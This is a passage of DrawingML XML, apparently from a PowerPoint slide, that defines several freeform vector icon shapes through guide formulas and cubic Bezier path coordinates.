                      <a:pt x="53" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="61"/>
                      <a:pt x="59" y="62"/>
                      <a:pt x="61" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="65"/>
                      <a:pt x="72" y="65"/>
                      <a:pt x="77" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="59"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="87" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="27"/>
                      <a:pt x="71" y="23"/>
                      <a:pt x="6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:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E97D20E-31BE-4E75-BA11-2B79568FC3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60507" y="3483672"/>
                <a:ext cx="146800" cy="154628"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 46"/>
                  <a:gd name="T1" fmla="*/ 29 h 48"/>
                  <a:gd name="T2" fmla="*/ 46 w 46"/>
                  <a:gd name="T3" fmla="*/ 16 h 48"/>
                  <a:gd name="T4" fmla="*/ 41 w 46"/>
                  <a:gd name="T5" fmla="*/ 8 h 48"/>
                  <a:gd name="T6" fmla="*/ 37 w 46"/>
                  <a:gd name="T7" fmla="*/ 9 h 48"/>
                  <a:gd name="T8" fmla="*/ 28 w 46"/>
                  <a:gd name="T9" fmla="*/ 0 h 48"/>
                  <a:gd name="T10" fmla="*/ 18 w 46"/>
                  <a:gd name="T11" fmla="*/ 0 h 48"/>
                  <a:gd name="T12" fmla="*/ 17 w 46"/>
                  <a:gd name="T13" fmla="*/ 4 h 48"/>
                  <a:gd name="T14" fmla="*/ 4 w 46"/>
                  <a:gd name="T15" fmla="*/ 8 h 48"/>
                  <a:gd name="T16" fmla="*/ 0 w 46"/>
                  <a:gd name="T17" fmla="*/ 16 h 48"/>
                  <a:gd name="T18" fmla="*/ 3 w 46"/>
                  <a:gd name="T19" fmla="*/ 19 h 48"/>
                  <a:gd name="T20" fmla="*/ 0 w 46"/>
                  <a:gd name="T21" fmla="*/ 32 h 48"/>
                  <a:gd name="T22" fmla="*/ 4 w 46"/>
                  <a:gd name="T23" fmla="*/ 40 h 48"/>
                  <a:gd name="T24" fmla="*/ 9 w 46"/>
                  <a:gd name="T25" fmla="*/ 39 h 48"/>
                  <a:gd name="T26" fmla="*/ 18 w 46"/>
                  <a:gd name="T27" fmla="*/ 48 h 48"/>
                  <a:gd name="T28" fmla="*/ 28 w 46"/>
                  <a:gd name="T29" fmla="*/ 48 h 48"/>
                  <a:gd name="T30" fmla="*/ 29 w 46"/>
                  <a:gd name="T31" fmla="*/ 44 h 48"/>
                  <a:gd name="T32" fmla="*/ 41 w 46"/>
                  <a:gd name="T33" fmla="*/ 40 h 48"/>
                  <a:gd name="T34" fmla="*/ 46 w 46"/>
                  <a:gd name="T35" fmla="*/ 32 h 48"/>
                  <a:gd name="T36" fmla="*/ 43 w 46"/>
                  <a:gd name="T37" fmla="*/ 29 h 48"/>
                  <a:gd name="T38" fmla="*/ 23 w 46"/>
                  <a:gd name="T39" fmla="*/ 34 h 48"/>
                  <a:gd name="T40" fmla="*/ 13 w 46"/>
                  <a:gd name="T41" fmla="*/ 24 h 48"/>
                  <a:gd name="T42" fmla="*/ 23 w 46"/>
                  <a:gd name="T43" fmla="*/ 14 h 48"/>
                  <a:gd name="T44" fmla="*/ 33 w 46"/>
                  <a:gd name="T45" fmla="*/ 24 h 48"/>
                  <a:gd name="T46" fmla="*/ 23 w 46"/>
                  <a:gd name="T47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48">
                    <a:moveTo>
                      <a:pt x="43" y="29"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="24"/>
                      <a:pt x="42" y="19"/>
                      <a:pt x="46" y="1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9"/>
                      <a:pt x="38" y="9"/>
                      <a:pt x="37" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="9"/>
                      <a:pt x="28" y="5"/>
                      <a:pt x="2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0"/>
                      <a:pt x="4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2" y="18"/>
                      <a:pt x="3" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="24"/>
                      <a:pt x="4" y="29"/>
                      <a:pt x="0" y="3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6" y="39"/>
                      <a:pt x="7" y="39"/>
                      <a:pt x="9" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="39"/>
                      <a:pt x="18" y="43"/>
                      <a:pt x="1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7"/>
                      <a:pt x="28" y="45"/>
                      <a:pt x="29" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="39"/>
                      <a:pt x="37" y="38"/>
                      <a:pt x="41" y="40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1"/>
                      <a:pt x="44" y="30"/>
                      <a:pt x="43" y="29"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="23" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="34"/>
                      <a:pt x="13" y="29"/>
                      <a:pt x="13" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="19"/>
                      <a:pt x="17" y="14"/>
                      <a:pt x="23" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="14"/>
                      <a:pt x="33" y="19"/>
                      <a:pt x="33" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="29"/>
                      <a:pt x="28" y="34"/>
                      <a:pt x="2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4" name="Freeform 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F3A62FC-855C-488E-9F8A-AED966BC2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5776" y="3078504"/>
                <a:ext cx="223135" cy="227050"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 70"/>
                  <a:gd name="T1" fmla="*/ 45 h 71"/>
                  <a:gd name="T2" fmla="*/ 41 w 70"/>
                  <a:gd name="T3" fmla="*/ 32 h 71"/>
                  <a:gd name="T4" fmla="*/ 70 w 70"/>
                  <a:gd name="T5" fmla="*/ 10 h 71"/>
                  <a:gd name="T6" fmla="*/ 62 w 70"/>
                  <a:gd name="T7" fmla="*/ 1 h 71"/>
                  <a:gd name="T8" fmla="*/ 25 w 70"/>
                  <a:gd name="T9" fmla="*/ 16 h 71"/>
                  <a:gd name="T10" fmla="*/ 13 w 70"/>
                  <a:gd name="T11" fmla="*/ 5 h 71"/>
                  <a:gd name="T12" fmla="*/ 2 w 70"/>
                  <a:gd name="T13" fmla="*/ 3 h 71"/>
                  <a:gd name="T14" fmla="*/ 4 w 70"/>
                  <a:gd name="T15" fmla="*/ 13 h 71"/>
                  <a:gd name="T16" fmla="*/ 16 w 70"/>
                  <a:gd name="T17" fmla="*/ 25 h 71"/>
                  <a:gd name="T18" fmla="*/ 1 w 70"/>
                  <a:gd name="T19" fmla="*/ 62 h 71"/>
                  <a:gd name="T20" fmla="*/ 10 w 70"/>
                  <a:gd name="T21" fmla="*/ 71 h 71"/>
                  <a:gd name="T22" fmla="*/ 32 w 70"/>
                  <a:gd name="T23" fmla="*/ 41 h 71"/>
                  <a:gd name="T24" fmla="*/ 44 w 70"/>
                  <a:gd name="T25" fmla="*/ 53 h 71"/>
                  <a:gd name="T26" fmla="*/ 44 w 70"/>
                  <a:gd name="T27" fmla="*/ 71 h 71"/>
                  <a:gd name="T28" fmla="*/ 53 w 70"/>
                  <a:gd name="T29" fmla="*/ 71 h 71"/>
                  <a:gd name="T30" fmla="*/ 57 w 70"/>
                  <a:gd name="T31" fmla="*/ 58 h 71"/>
                  <a:gd name="T32" fmla="*/ 70 w 70"/>
                  <a:gd name="T33" fmla="*/ 53 h 71"/>
                  <a:gd name="T34" fmla="*/ 70 w 70"/>
                  <a:gd name="T35" fmla="*/ 45 h 71"/>
                  <a:gd name="T36" fmla="*/ 53 w 70"/>
                  <a:gd name="T37" fmla="*/ 4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0" h="71">
                    <a:moveTo>
                      <a:pt x="53" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="32"/>
                      <a:pt x="41" y="32"/>
                      <a:pt x="41" y="32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1"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="2" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5"/>
                      <a:pt x="1" y="10"/>
                      <a:pt x="4" y="13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10" y="71"/>
                      <a:pt x="10" y="71"/>
                      <a:pt x="10" y="71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4" y="71"/>
                      <a:pt x="44" y="71"/>
                      <a:pt x="44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70" y="53"/>
                      <a:pt x="70" y="53"/>
                      <a:pt x="70" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="45"/>
                      <a:pt x="70" y="45"/>
                      <a:pt x="70" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="45"/>
                      <a:pt x="53" y="45"/>
                      <a:pt x="5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5" name="Freeform 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD0A06BC-FEAE-4BF1-AB12-C7620AAF7E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9802" y="3225304"/>
                <a:ext cx="78293" cy="142884"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 16 w 24"/>
                  <a:gd name="T1" fmla="*/ 44 h 45"/>
                  <a:gd name="T2" fmla="*/ 16 w 24"/>
                  <a:gd name="T3" fmla="*/ 44 h 45"/>
                  <a:gd name="T4" fmla="*/ 23 w 24"/>
                  <a:gd name="T5" fmla="*/ 34 h 45"/>
                  <a:gd name="T6" fmla="*/ 21 w 24"/>
                  <a:gd name="T7" fmla="*/ 23 h 45"/>
                  <a:gd name="T8" fmla="*/ 11 w 24"/>
                  <a:gd name="T9" fmla="*/ 16 h 45"/>
                  <a:gd name="T10" fmla="*/ 11 w 24"/>
                  <a:gd name="T11" fmla="*/ 16 h 45"/>
                  <a:gd name="T12" fmla="*/ 10 w 24"/>
                  <a:gd name="T13" fmla="*/ 17 h 45"/>
                  <a:gd name="T14" fmla="*/ 11 w 24"/>
                  <a:gd name="T15" fmla="*/ 20 h 45"/>
                  <a:gd name="T16" fmla="*/ 12 w 24"/>
                  <a:gd name="T17" fmla="*/ 20 h 45"/>
                  <a:gd name="T18" fmla="*/ 12 w 24"/>
                  <a:gd name="T19" fmla="*/ 20 h 45"/>
                  <a:gd name="T20" fmla="*/ 17 w 24"/>
                  <a:gd name="T21" fmla="*/ 24 h 45"/>
                  <a:gd name="T22" fmla="*/ 19 w 24"/>
                  <a:gd name="T23" fmla="*/ 35 h 45"/>
                  <a:gd name="T24" fmla="*/ 16 w 24"/>
                  <a:gd name="T25" fmla="*/ 40 h 45"/>
                  <a:gd name="T26" fmla="*/ 16 w 24"/>
                  <a:gd name="T27" fmla="*/ 40 h 45"/>
                  <a:gd name="T28" fmla="*/ 10 w 24"/>
                  <a:gd name="T29" fmla="*/ 36 h 45"/>
                  <a:gd name="T30" fmla="*/ 9 w 24"/>
                  <a:gd name="T31" fmla="*/ 31 h 45"/>
                  <a:gd name="T32" fmla="*/ 5 w 24"/>
                  <a:gd name="T33" fmla="*/ 30 h 45"/>
                  <a:gd name="T34" fmla="*/ 6 w 24"/>
                  <a:gd name="T35" fmla="*/ 37 h 45"/>
                  <a:gd name="T36" fmla="*/ 16 w 24"/>
                  <a:gd name="T37" fmla="*/ 44 h 45"/>
                  <a:gd name="T38" fmla="*/ 13 w 24"/>
                  <a:gd name="T39" fmla="*/ 28 h 45"/>
                  <a:gd name="T40" fmla="*/ 15 w 24"/>
                  <a:gd name="T41" fmla="*/ 28 h 45"/>
                  <a:gd name="T42" fmla="*/ 14 w 24"/>
                  <a:gd name="T43" fmla="*/ 24 h 45"/>
                  <a:gd name="T44" fmla="*/ 13 w 24"/>
                  <a:gd name="T45" fmla="*/ 24 h 45"/>
                  <a:gd name="T46" fmla="*/ 12 w 24"/>
                  <a:gd name="T47" fmla="*/ 24 h 45"/>
                  <a:gd name="T48" fmla="*/ 7 w 24"/>
                  <a:gd name="T49" fmla="*/ 21 h 45"/>
                  <a:gd name="T50" fmla="*/ 5 w 24"/>
                  <a:gd name="T51" fmla="*/ 10 h 45"/>
                  <a:gd name="T52" fmla="*/ 9 w 24"/>
                  <a:gd name="T53" fmla="*/ 4 h 45"/>
                  <a:gd name="T54" fmla="*/ 9 w 24"/>
                  <a:gd name="T55" fmla="*/ 4 h 45"/>
                  <a:gd name="T56" fmla="*/ 14 w 24"/>
                  <a:gd name="T57" fmla="*/ 8 h 45"/>
                  <a:gd name="T58" fmla="*/ 15 w 24"/>
                  <a:gd name="T59" fmla="*/ 13 h 45"/>
                  <a:gd name="T60" fmla="*/ 20 w 24"/>
                  <a:gd name="T61" fmla="*/ 15 h 45"/>
                  <a:gd name="T62" fmla="*/ 18 w 24"/>
                  <a:gd name="T63" fmla="*/ 7 h 45"/>
                  <a:gd name="T64" fmla="*/ 8 w 24"/>
                  <a:gd name="T65" fmla="*/ 0 h 45"/>
                  <a:gd name="T66" fmla="*/ 8 w 24"/>
                  <a:gd name="T67" fmla="*/ 1 h 45"/>
                  <a:gd name="T68" fmla="*/ 1 w 24"/>
                  <a:gd name="T69" fmla="*/ 11 h 45"/>
                  <a:gd name="T70" fmla="*/ 3 w 24"/>
                  <a:gd name="T71" fmla="*/ 21 h 45"/>
                  <a:gd name="T72" fmla="*/ 13 w 24"/>
                  <a:gd name="T73" fmla="*/ 2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4" h="45">
                    <a:moveTo>
                      <a:pt x="16" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="44"/>
                      <a:pt x="16" y="44"/>
                      <a:pt x="16" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="43"/>
                      <a:pt x="24" y="38"/>
                      <a:pt x="23" y="34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0" y="18"/>
                      <a:pt x="16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0" y="16"/>
                      <a:pt x="10" y="17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2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4" y="20"/>
                      <a:pt x="17" y="21"/>
                      <a:pt x="17" y="24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20" y="37"/>
                      <a:pt x="18" y="39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3" y="41"/>
                      <a:pt x="11" y="39"/>
                      <a:pt x="10" y="36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8" y="31"/>
                      <a:pt x="6" y="30"/>
                      <a:pt x="5" y="30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7" y="42"/>
                      <a:pt x="12" y="45"/>
                      <a:pt x="16" y="44"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="13" y="28"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="28"/>
                      <a:pt x="14" y="28"/>
                      <a:pt x="15" y="28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5"/>
                      <a:pt x="8" y="23"/>
                      <a:pt x="7" y="2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7"/>
                      <a:pt x="6" y="5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4"/>
                      <a:pt x="14" y="6"/>
                      <a:pt x="14" y="8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7" y="13"/>
                      <a:pt x="18" y="14"/>
                      <a:pt x="20" y="15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3"/>
                      <a:pt x="13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3" y="1"/>
                      <a:pt x="0" y="6"/>
                      <a:pt x="1" y="1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6"/>
                      <a:pt x="9" y="29"/>
                      <a:pt x="1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6" name="Freeform 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D3CA806-275F-4843-8312-4F1456D5C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53030" y="3186158"/>
                <a:ext cx="293599" cy="295556"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 92"/>
                  <a:gd name="T1" fmla="*/ 18 h 92"/>
                  <a:gd name="T2" fmla="*/ 92 w 92"/>
                  <a:gd name="T3" fmla="*/ 0 h 92"/>
                  <a:gd name="T4" fmla="*/ 92 w 92"/>
                  <a:gd name="T5" fmla="*/ 6 h 92"/>
                  <a:gd name="T6" fmla="*/ 92 w 92"/>
                  <a:gd name="T7" fmla="*/ 18 h 92"/>
                  <a:gd name="T8" fmla="*/ 92 w 92"/>
                  <a:gd name="T9" fmla="*/ 67 h 92"/>
                  <a:gd name="T10" fmla="*/ 72 w 92"/>
                  <a:gd name="T11" fmla="*/ 81 h 92"/>
                  <a:gd name="T12" fmla="*/ 52 w 92"/>
                  <a:gd name="T13" fmla="*/ 67 h 92"/>
                  <a:gd name="T14" fmla="*/ 72 w 92"/>
                  <a:gd name="T15" fmla="*/ 52 h 92"/>
                  <a:gd name="T16" fmla="*/ 80 w 92"/>
                  <a:gd name="T17" fmla="*/ 54 h 92"/>
                  <a:gd name="T18" fmla="*/ 80 w 92"/>
                  <a:gd name="T19" fmla="*/ 24 h 92"/>
                  <a:gd name="T20" fmla="*/ 40 w 92"/>
                  <a:gd name="T21" fmla="*/ 35 h 92"/>
                  <a:gd name="T22" fmla="*/ 40 w 92"/>
                  <a:gd name="T23" fmla="*/ 78 h 92"/>
                  <a:gd name="T24" fmla="*/ 20 w 92"/>
                  <a:gd name="T25" fmla="*/ 92 h 92"/>
                  <a:gd name="T26" fmla="*/ 0 w 92"/>
                  <a:gd name="T27" fmla="*/ 78 h 92"/>
                  <a:gd name="T28" fmla="*/ 20 w 92"/>
                  <a:gd name="T29" fmla="*/ 64 h 92"/>
                  <a:gd name="T30" fmla="*/ 29 w 92"/>
                  <a:gd name="T31" fmla="*/ 65 h 92"/>
                  <a:gd name="T32" fmla="*/ 29 w 92"/>
                  <a:gd name="T33" fmla="*/ 35 h 92"/>
                  <a:gd name="T34" fmla="*/ 29 w 92"/>
                  <a:gd name="T35" fmla="*/ 1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92">
                    <a:moveTo>
                      <a:pt x="29" y="18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18"/>
                      <a:pt x="92" y="18"/>
                      <a:pt x="92" y="18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74"/>
                      <a:pt x="83" y="81"/>
                      <a:pt x="72" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="81"/>
                      <a:pt x="52" y="74"/>
                      <a:pt x="52" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="59"/>
                      <a:pt x="61" y="52"/>
                      <a:pt x="72" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="52"/>
                      <a:pt x="78" y="53"/>
                      <a:pt x="80" y="54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0" y="86"/>
                      <a:pt x="31" y="92"/>
                      <a:pt x="20" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="92"/>
                      <a:pt x="0" y="86"/>
                      <a:pt x="0" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="70"/>
                      <a:pt x="9" y="64"/>
                      <a:pt x="20" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="64"/>
                      <a:pt x="26" y="64"/>
                      <a:pt x="29" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="35"/>
                      <a:pt x="29" y="35"/>
                      <a:pt x="29" y="35"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2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7" name="Freeform 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7534B64F-E6CD-4409-805F-4F0E7FFBF6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89868" y="2540239"/>
                <a:ext cx="207477" cy="291641"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 38 w 65"/>
                  <a:gd name="T1" fmla="*/ 46 h 91"/>
                  <a:gd name="T2" fmla="*/ 46 w 65"/>
                  <a:gd name="T3" fmla="*/ 26 h 91"/>
                  <a:gd name="T4" fmla="*/ 52 w 65"/>
                  <a:gd name="T5" fmla="*/ 33 h 91"/>
                  <a:gd name="T6" fmla="*/ 47 w 65"/>
                  <a:gd name="T7" fmla="*/ 46 h 91"/>
                  <a:gd name="T8" fmla="*/ 52 w 65"/>
                  <a:gd name="T9" fmla="*/ 59 h 91"/>
                  <a:gd name="T10" fmla="*/ 45 w 65"/>
                  <a:gd name="T11" fmla="*/ 65 h 91"/>
                  <a:gd name="T12" fmla="*/ 38 w 65"/>
                  <a:gd name="T13" fmla="*/ 46 h 91"/>
                  <a:gd name="T14" fmla="*/ 32 w 65"/>
                  <a:gd name="T15" fmla="*/ 78 h 91"/>
                  <a:gd name="T16" fmla="*/ 19 w 65"/>
                  <a:gd name="T17" fmla="*/ 46 h 91"/>
                  <a:gd name="T18" fmla="*/ 33 w 65"/>
                  <a:gd name="T19" fmla="*/ 13 h 91"/>
                  <a:gd name="T20" fmla="*/ 39 w 65"/>
                  <a:gd name="T21" fmla="*/ 20 h 91"/>
                  <a:gd name="T22" fmla="*/ 39 w 65"/>
                  <a:gd name="T23" fmla="*/ 20 h 91"/>
                  <a:gd name="T24" fmla="*/ 28 w 65"/>
                  <a:gd name="T25" fmla="*/ 46 h 91"/>
                  <a:gd name="T26" fmla="*/ 39 w 65"/>
                  <a:gd name="T27" fmla="*/ 72 h 91"/>
                  <a:gd name="T28" fmla="*/ 32 w 65"/>
                  <a:gd name="T29" fmla="*/ 78 h 91"/>
                  <a:gd name="T30" fmla="*/ 6 w 65"/>
                  <a:gd name="T31" fmla="*/ 20 h 91"/>
                  <a:gd name="T32" fmla="*/ 20 w 65"/>
                  <a:gd name="T33" fmla="*/ 0 h 91"/>
                  <a:gd name="T34" fmla="*/ 20 w 65"/>
                  <a:gd name="T35" fmla="*/ 0 h 91"/>
                  <a:gd name="T36" fmla="*/ 27 w 65"/>
                  <a:gd name="T37" fmla="*/ 6 h 91"/>
                  <a:gd name="T38" fmla="*/ 10 w 65"/>
                  <a:gd name="T39" fmla="*/ 45 h 91"/>
                  <a:gd name="T40" fmla="*/ 26 w 65"/>
                  <a:gd name="T41" fmla="*/ 85 h 91"/>
                  <a:gd name="T42" fmla="*/ 19 w 65"/>
                  <a:gd name="T43" fmla="*/ 91 h 91"/>
                  <a:gd name="T44" fmla="*/ 5 w 65"/>
                  <a:gd name="T45" fmla="*/ 70 h 91"/>
                  <a:gd name="T46" fmla="*/ 1 w 65"/>
                  <a:gd name="T47" fmla="*/ 45 h 91"/>
                  <a:gd name="T48" fmla="*/ 6 w 65"/>
                  <a:gd name="T49" fmla="*/ 20 h 91"/>
                  <a:gd name="T50" fmla="*/ 61 w 65"/>
                  <a:gd name="T51" fmla="*/ 51 h 91"/>
                  <a:gd name="T52" fmla="*/ 65 w 65"/>
                  <a:gd name="T53" fmla="*/ 46 h 91"/>
                  <a:gd name="T54" fmla="*/ 61 w 65"/>
                  <a:gd name="T55" fmla="*/ 41 h 91"/>
                  <a:gd name="T56" fmla="*/ 56 w 65"/>
                  <a:gd name="T57" fmla="*/ 46 h 91"/>
                  <a:gd name="T58" fmla="*/ 61 w 65"/>
                  <a:gd name="T59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5" h="91">
                    <a:moveTo>
                      <a:pt x="38" y="46"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="38"/>
                      <a:pt x="41" y="31"/>
                      <a:pt x="46" y="26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49" y="36"/>
                      <a:pt x="47" y="41"/>
                      <a:pt x="47" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="51"/>
                      <a:pt x="49" y="56"/>
                      <a:pt x="52" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="65"/>
                      <a:pt x="45" y="65"/>
                      <a:pt x="45" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="60"/>
                      <a:pt x="37" y="53"/>
                      <a:pt x="38" y="46"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32" y="78"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="69"/>
                      <a:pt x="19" y="58"/>
                      <a:pt x="19" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="33"/>
                      <a:pt x="24" y="22"/>
                      <a:pt x="33" y="13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2" y="27"/>
                      <a:pt x="28" y="36"/>
                      <a:pt x="28" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="55"/>
                      <a:pt x="32" y="65"/>
                      <a:pt x="39" y="72"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="32" y="78"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6" y="20"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="13"/>
                      <a:pt x="14" y="6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6" y="17"/>
                      <a:pt x="10" y="31"/>
                      <a:pt x="10" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="60"/>
                      <a:pt x="15" y="74"/>
                      <a:pt x="26" y="85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13" y="85"/>
                      <a:pt x="9" y="78"/>
                      <a:pt x="5" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="62"/>
                      <a:pt x="0" y="54"/>
                      <a:pt x="1" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="37"/>
                      <a:pt x="3" y="28"/>
                      <a:pt x="6" y="20"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="61" y="51"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="51"/>
                      <a:pt x="65" y="49"/>
                      <a:pt x="65" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="44"/>
                      <a:pt x="63" y="41"/>
                      <a:pt x="61" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="41"/>
                      <a:pt x="56" y="43"/>
                      <a:pt x="56" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="49"/>
                      <a:pt x="58" y="51"/>
                      <a:pt x="61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8" name="Freeform 29">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D676E1D-8CE3-4C1A-B87B-5B8063E805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13531" y="2853412"/>
                <a:ext cx="201605" cy="201604"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 103"/>
                  <a:gd name="T1" fmla="*/ 27 h 103"/>
                  <a:gd name="T2" fmla="*/ 65 w 103"/>
                  <a:gd name="T3" fmla="*/ 2 h 103"/>
                  <a:gd name="T4" fmla="*/ 19 w 103"/>
                  <a:gd name="T5" fmla="*/ 0 h 103"/>
                  <a:gd name="T6" fmla="*/ 1 w 103"/>
                  <a:gd name="T7" fmla="*/ 20 h 103"/>
                  <a:gd name="T8" fmla="*/ 0 w 103"/>
                  <a:gd name="T9" fmla="*/ 77 h 103"/>
                  <a:gd name="T10" fmla="*/ 39 w 103"/>
                  <a:gd name="T11" fmla="*/ 77 h 103"/>
                  <a:gd name="T12" fmla="*/ 37 w 103"/>
                  <a:gd name="T13" fmla="*/ 102 h 103"/>
                  <a:gd name="T14" fmla="*/ 101 w 103"/>
                  <a:gd name="T15" fmla="*/ 103 h 103"/>
                  <a:gd name="T16" fmla="*/ 103 w 103"/>
                  <a:gd name="T17" fmla="*/ 27 h 103"/>
                  <a:gd name="T18" fmla="*/ 63 w 103"/>
                  <a:gd name="T19" fmla="*/ 27 h 103"/>
                  <a:gd name="T20" fmla="*/ 19 w 103"/>
                  <a:gd name="T21" fmla="*/ 10 h 103"/>
                  <a:gd name="T22" fmla="*/ 19 w 103"/>
                  <a:gd name="T23" fmla="*/ 20 h 103"/>
                  <a:gd name="T24" fmla="*/ 9 w 103"/>
                  <a:gd name="T25" fmla="*/ 20 h 103"/>
                  <a:gd name="T26" fmla="*/ 19 w 103"/>
                  <a:gd name="T27" fmla="*/ 10 h 103"/>
                  <a:gd name="T28" fmla="*/ 6 w 103"/>
                  <a:gd name="T29" fmla="*/ 71 h 103"/>
                  <a:gd name="T30" fmla="*/ 6 w 103"/>
                  <a:gd name="T31" fmla="*/ 27 h 103"/>
                  <a:gd name="T32" fmla="*/ 26 w 103"/>
                  <a:gd name="T33" fmla="*/ 27 h 103"/>
                  <a:gd name="T34" fmla="*/ 26 w 103"/>
                  <a:gd name="T35" fmla="*/ 7 h 103"/>
                  <a:gd name="T36" fmla="*/ 58 w 103"/>
                  <a:gd name="T37" fmla="*/ 7 h 103"/>
                  <a:gd name="T38" fmla="*/ 58 w 103"/>
                  <a:gd name="T39" fmla="*/ 27 h 103"/>
                  <a:gd name="T40" fmla="*/ 39 w 103"/>
                  <a:gd name="T41" fmla="*/ 46 h 103"/>
                  <a:gd name="T42" fmla="*/ 39 w 103"/>
                  <a:gd name="T43" fmla="*/ 71 h 103"/>
                  <a:gd name="T44" fmla="*/ 6 w 103"/>
                  <a:gd name="T45" fmla="*/ 71 h 103"/>
                  <a:gd name="T46" fmla="*/ 57 w 103"/>
                  <a:gd name="T47" fmla="*/ 36 h 103"/>
                  <a:gd name="T48" fmla="*/ 57 w 103"/>
                  <a:gd name="T49" fmla="*/ 46 h 103"/>
